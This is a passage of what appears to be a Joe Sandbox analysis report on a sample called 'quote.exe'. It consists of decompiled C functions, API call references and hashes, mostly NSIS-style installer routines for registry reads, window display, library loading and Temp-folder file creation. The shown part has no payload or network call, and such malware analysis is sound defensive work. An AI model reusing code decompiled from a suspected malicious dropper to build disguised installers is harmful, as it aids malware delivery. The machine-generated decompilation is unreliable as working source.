                                                                                      				void* _t26;
                                                                                      				void* _t29;
                                                                                      
                                                                                      				_t22 = __edi;
                                                                                      				_t21 = __edx;
                                                                                      				_t16 = __ebx;
                                                                                      				_t9 = E00402D7E(_t29, 0x20019); // executed
                                                                                      				_t24 = _t9;
                                                                                      				_t10 = E00402D1C(3);
                                                                                      				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
                                                                                      				 *__edi = __ebx;
                                                                                      				if(_t24 == __ebx) {
                                                                                      					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                      				} else {
                                                                                      					 *(_t26 + 8) = 0x3ff;
                                                                                      					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
                                                                                      						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx); // executed
                                                                                      						__eflags = _t13;
                                                                                      						if(_t13 != 0) {
                                                                                      							 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                      						}
                                                                                      					} else {
                                                                                      						RegEnumKeyW(_t24, _t10, __edi, 0x3ff);
                                                                                      					}
                                                                                      					_t22[0x3ff] = _t16;
                                                                                      					_push(_t24);
                                                                                      					RegCloseKey();
                                                                                      				}
                                                                                      				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t26 - 4));
                                                                                      				return 0;
                                                                                      			}












                                                                                      0x00402596
                                                                                      0x00402596
                                                                                      0x00402596
                                                                                      0x0040259b
                                                                                      0x004025a2
                                                                                      0x004025a4
                                                                                      0x004025ac
                                                                                      0x004025af
                                                                                      0x004025b2
                                                                                      0x00402925
                                                                                      0x004025b8
                                                                                      0x004025c0
                                                                                      0x004025c3
                                                                                      0x004025dc
                                                                                      0x004025e2
                                                                                      0x004025e4
                                                                                      0x004025e6
                                                                                      0x004025e6
                                                                                      0x004025c5
                                                                                      0x004025c9
                                                                                      0x004025c9
                                                                                      0x004025ed
                                                                                      0x004025f4
                                                                                      0x004025f5
                                                                                      0x004025f5
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025C9
                                                                                      • RegEnumValueW.KERNELBASE(00000000,00000000,?,?), ref: 004025DC
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsd599A.tmp,00000000,00000011,00000002), ref: 004025F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: Enum$CloseValue
                                                                                      • String ID:
                                                                                      • API String ID: 397863658-0
                                                                                      • Opcode ID: 693b4b7c162b2071d808d1ccb663ddef88a55d9f63883adb613dff133cf19400
                                                                                      • Instruction ID: a8e4f27cd85b524b938bc80bb312ff0c07efa3365ef466736b2b8963d993c2c8
                                                                                      • Opcode Fuzzy Hash: 693b4b7c162b2071d808d1ccb663ddef88a55d9f63883adb613dff133cf19400
                                                                                      • Instruction Fuzzy Hash: 92017C71A11504BBEB149FA49E48AAFB77CEF40348F10403AF501B61C0D7B85E40866D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 84%
                                                                                      			E00402522(int* __ebx, char* __edi) {
                                                                                      				void* _t17;
                                                                                      				short* _t18;
                                                                                      				void* _t35;
                                                                                      				void* _t37;
                                                                                      				void* _t40;
                                                                                      
                                                                                      				_t33 = __edi;
                                                                                      				_t27 = __ebx;
                                                                                      				_t17 = E00402D7E(_t40, 0x20019); // executed
                                                                                      				_t35 = _t17;
                                                                                      				_t18 = E00402D3E(0x33);
                                                                                      				 *__edi = __ebx;
                                                                                      				if(_t35 == __ebx) {
                                                                                      					 *(_t37 - 4) = 1;
                                                                                      				} else {
                                                                                      					 *(_t37 - 0x10) = 0x800;
                                                                                      					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
                                                                                      						L7:
                                                                                      						 *_t33 = _t27;
                                                                                      						 *(_t37 - 4) = 1;
                                                                                      					} else {
                                                                                      						if( *(_t37 + 8) == 4) {
                                                                                      							__eflags =  *(_t37 - 0x20) - __ebx;
                                                                                      							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
                                                                                      							E00406358(__edi,  *__edi);
                                                                                      						} else {
                                                                                      							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                                                      								 *(_t37 - 4) =  *(_t37 - 0x20);
                                                                                      								_t33[0x7fe] = _t27;
                                                                                      							} else {
                                                                                      								goto L7;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					_push(_t35);
                                                                                      					RegCloseKey();
                                                                                      				}
                                                                                      				 *0x434fa8 =  *0x434fa8 +  *(_t37 - 4);
                                                                                      				return 0;
                                                                                      			}








                                                                                      0x00402522
                                                                                      0x00402522
                                                                                      0x00402527
                                                                                      0x0040252e
                                                                                      0x00402530
                                                                                      0x00402537
                                                                                      0x0040253a
                                                                                      0x00402925
                                                                                      0x00402540
                                                                                      0x00402543
                                                                                      0x0040255e
                                                                                      0x0040258e
                                                                                      0x0040258e
                                                                                      0x00402591
                                                                                      0x00402560
                                                                                      0x00402564
                                                                                      0x0040257d
                                                                                      0x00402584
                                                                                      0x00402587
                                                                                      0x00402566
                                                                                      0x00402569
                                                                                      0x00402574
                                                                                      0x004025ed
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00402569
                                                                                      0x00402564
                                                                                      0x004025f4
                                                                                      0x004025f5
                                                                                      0x004025f5
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402553
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsd599A.tmp,00000000,00000011,00000002), ref: 004025F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseQueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3356406503-0
                                                                                      • Opcode ID: 56e4d4d613bd04b4b218fdf93facc56148b7a221993560d2564f1528257e3b52
                                                                                      • Instruction ID: af493c066ab36ea8406690c3d62a07c4fb2ed7115def6bf4d18b774961f6c260
                                                                                      • Opcode Fuzzy Hash: 56e4d4d613bd04b4b218fdf93facc56148b7a221993560d2564f1528257e3b52
                                                                                      • Instruction Fuzzy Hash: CD116A71910209EBCF14DFA4CA589AEB774FF04354B20843BE402B62C0D3B88A44DB5E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 69%
                                                                                      			E00401389(signed int _a4) {
                                                                                      				intOrPtr* _t6;
                                                                                      				void* _t8;
                                                                                      				void* _t10;
                                                                                      				signed int _t11;
                                                                                      				void* _t12;
                                                                                      				signed int _t16;
                                                                                      				signed int _t17;
                                                                                      				void* _t18;
                                                                                      
                                                                                      				_t17 = _a4;
                                                                                      				while(_t17 >= 0) {
                                                                                      					_t6 = _t17 * 0x1c +  *0x434f50;
                                                                                      					if( *_t6 == 1) {
                                                                                      						break;
                                                                                      					}
                                                                                      					_push(_t6); // executed
                                                                                      					_t8 = E00401434(); // executed
                                                                                      					if(_t8 == 0x7fffffff) {
                                                                                      						return 0x7fffffff;
                                                                                      					}
                                                                                      					_t10 = E0040136D(_t8);
                                                                                      					if(_t10 != 0) {
                                                                                      						_t11 = _t10 - 1;
                                                                                      						_t16 = _t17;
                                                                                      						_t17 = _t11;
                                                                                      						_t12 = _t11 - _t16;
                                                                                      					} else {
                                                                                      						_t12 = _t10 + 1;
                                                                                      						_t17 = _t17 + 1;
                                                                                      					}
                                                                                      					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                      						 *0x433eec =  *0x433eec + _t12;
                                                                                      						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
                                                                                      					}
                                                                                      				}
                                                                                      				return 0;
                                                                                      			}











                                                                                      0x0040138a
                                                                                      0x004013fa
                                                                                      0x0040139b
                                                                                      0x004013a0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004013a2
                                                                                      0x004013a3
                                                                                      0x004013ad
                                                                                      0x00000000
                                                                                      0x00401404
                                                                                      0x004013b0
                                                                                      0x004013b7
                                                                                      0x004013bd
                                                                                      0x004013be
                                                                                      0x004013c0
                                                                                      0x004013c2
                                                                                      0x004013b9
                                                                                      0x004013b9
                                                                                      0x004013ba
                                                                                      0x004013ba
                                                                                      0x004013c9
                                                                                      0x004013cb
                                                                                      0x004013f4
                                                                                      0x004013f4
                                                                                      0x004013c9
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: c5196716ed2294a5b6683282f685902d4e4d655c798d26bf32279206d375a943
                                                                                      • Instruction ID: f4b073df4371d13d5e47470e1508f1e4354d1df05d26164fcbedf483487d3525
                                                                                      • Opcode Fuzzy Hash: c5196716ed2294a5b6683282f685902d4e4d655c798d26bf32279206d375a943
                                                                                      • Instruction Fuzzy Hash: 4D01F4316242209FE7094B389D05B6A3698E710319F14823FF855F65F1EA78DC029B4C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnableShow
                                                                                      • String ID:
                                                                                      • API String ID: 1136574915-0
                                                                                      • Opcode ID: 5b6eb51e974c6ffa25010b294a075ac5ec6cc0d8ab3a8806e3b9b7885e30bf9f
                                                                                      • Instruction ID: 5d2b838fc97348560faaf82546316e7c29db3ee13ca796b15ebd5141c346d58e
                                                                                      • Opcode Fuzzy Hash: 5b6eb51e974c6ffa25010b294a075ac5ec6cc0d8ab3a8806e3b9b7885e30bf9f
                                                                                      • Instruction Fuzzy Hash: 6FE09A32A042009FD704EFA4AE484AEB3B4EB90325B20097FE401F20C1CBB85C008A2D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00401573(void* __ebx) {
                                                                                      				int _t4;
                                                                                      				void* _t9;
                                                                                      				struct HWND__* _t11;
                                                                                      				struct HWND__* _t12;
                                                                                      				void* _t16;
                                                                                      
                                                                                      				_t9 = __ebx;
                                                                                      				_t11 =  *0x433ed0; // 0x10452
                                                                                      				if(_t11 != __ebx) {
                                                                                      					ShowWindow(_t11,  *(_t16 - 0x2c)); // executed
                                                                                      					_t4 =  *(_t16 - 0x30);
                                                                                      				}
                                                                                      				_t12 =  *0x433ee4; // 0x1044c
                                                                                      				if(_t12 != _t9) {
                                                                                      					ShowWindow(_t12, _t4); // executed
                                                                                      				}
                                                                                      				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t16 - 4));
                                                                                      				return 0;
                                                                                      			}








                                                                                      0x00401573
                                                                                      0x00401573
                                                                                      0x00401581
                                                                                      0x00401587
                                                                                      0x00401589
                                                                                      0x00401589
                                                                                      0x0040158c
                                                                                      0x00401594
                                                                                      0x0040159c
                                                                                      0x0040159c
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • ShowWindow.USER32(00010452,?), ref: 00401587
                                                                                      • ShowWindow.USER32(0001044C), ref: 0040159C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: ShowWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1268545403-0
                                                                                      • Opcode ID: ee6b34dc60ce046e7fc87c252979b9a5f26620d9aeb1dd86fb622a318af8ecd3
                                                                                      • Instruction ID: fa776b8181dd7fe9ab65e8e076fc9876fffd29900cbf92d35bc205126ec889e9
                                                                                      • Opcode Fuzzy Hash: ee6b34dc60ce046e7fc87c252979b9a5f26620d9aeb1dd86fb622a318af8ecd3
                                                                                      • Instruction Fuzzy Hash: 03E0BF76B20114ABCB14DFA8ED908AE77B6EB94315724453BE502B32D0C6B5AD408F68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00406806(signed int _a4) {
                                                                                      				struct HINSTANCE__* _t5;
                                                                                      				signed int _t10;
                                                                                      
                                                                                      				_t10 = _a4 << 3;
                                                                                      				_t8 =  *(_t10 + 0x40a3e0);
                                                                                      				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                                                                                      				if(_t5 != 0) {
                                                                                      					L2:
                                                                                      					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                                                                                      				}
                                                                                      				_t5 = E00406796(_t8); // executed
                                                                                      				if(_t5 == 0) {
                                                                                      					return 0;
                                                                                      				}
                                                                                      				goto L2;
                                                                                      			}





                                                                                      0x0040680e
                                                                                      0x00406811
                                                                                      0x00406818
                                                                                      0x00406820
                                                                                      0x0040682c
                                                                                      0x00000000
                                                                                      0x00406833
                                                                                      0x00406823
                                                                                      0x0040682a
                                                                                      0x00000000
                                                                                      0x0040683b
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,00403537,0000000B), ref: 00406818
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406833
                                                                                        • Part of subcall function 00406796: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004067AD
                                                                                        • Part of subcall function 00406796: wsprintfW.USER32 ref: 004067E8
                                                                                        • Part of subcall function 00406796: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067FC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2547128583-0
                                                                                      • Opcode ID: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                                                                      • Instruction ID: c5f632ab0fd527bf8e68b4786b10832766149758e6d8e51d9ba55f9b7eb13659
                                                                                      • Opcode Fuzzy Hash: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                                                                      • Instruction Fuzzy Hash: 30E0863350421056E211AA746E44C7B77A89F99750307843EF956F2080D738DC359679
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 68%
                                                                                      			E00405F07(WCHAR* _a4, long _a8, long _a12) {
                                                                                      				signed int _t5;
                                                                                      				void* _t6;
                                                                                      
                                                                                      				_t5 = GetFileAttributesW(_a4); // executed
                                                                                      				asm("sbb ecx, ecx");
                                                                                      				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                      				return _t6;
                                                                                      			}





                                                                                      0x00405f0b
                                                                                      0x00405f18
                                                                                      0x00405f2d
                                                                                      0x00405f33

                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\quote.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405F0B
                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F2D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCreate
                                                                                      • String ID:
                                                                                      • API String ID: 415043291-0
                                                                                      • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                      • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                      • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                      • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00405EE2(WCHAR* _a4) {
                                                                                      				signed char _t3;
                                                                                      				signed char _t7;
                                                                                      
                                                                                      				_t3 = GetFileAttributesW(_a4); // executed
                                                                                      				_t7 = _t3;
                                                                                      				if(_t7 != 0xffffffff) {
                                                                                      					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                                                      				}
                                                                                      				return _t7;
                                                                                      			}





                                                                                      0x00405ee7
                                                                                      0x00405eed
                                                                                      0x00405ef2
                                                                                      0x00405efb
                                                                                      0x00405efb
                                                                                      0x00405f04

                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00405AE7,?,?,00000000,00405CBD,?,?,?,?), ref: 00405EE7
                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405EFB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                      • Instruction ID: 11a24c4abb36edafbee48cc994cb64d758a4bce1ebd63d049f972be52462095a
                                                                                      • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                      • Instruction Fuzzy Hash: C7D0C9725045316BC2102728AF0889BBB55EB643717054A35F9A5A22B0CB314C528A98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004059C5(WCHAR* _a4) {
                                                                                      				int _t2;
                                                                                      
                                                                                      				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                                                      				if(_t2 == 0) {
                                                                                      					return GetLastError();
                                                                                      				}
                                                                                      				return 0;
                                                                                      			}




                                                                                      0x004059cb
                                                                                      0x004059d3
                                                                                      0x00000000
                                                                                      0x004059d9
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,004034B8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 004059CB
                                                                                      • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004059D9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
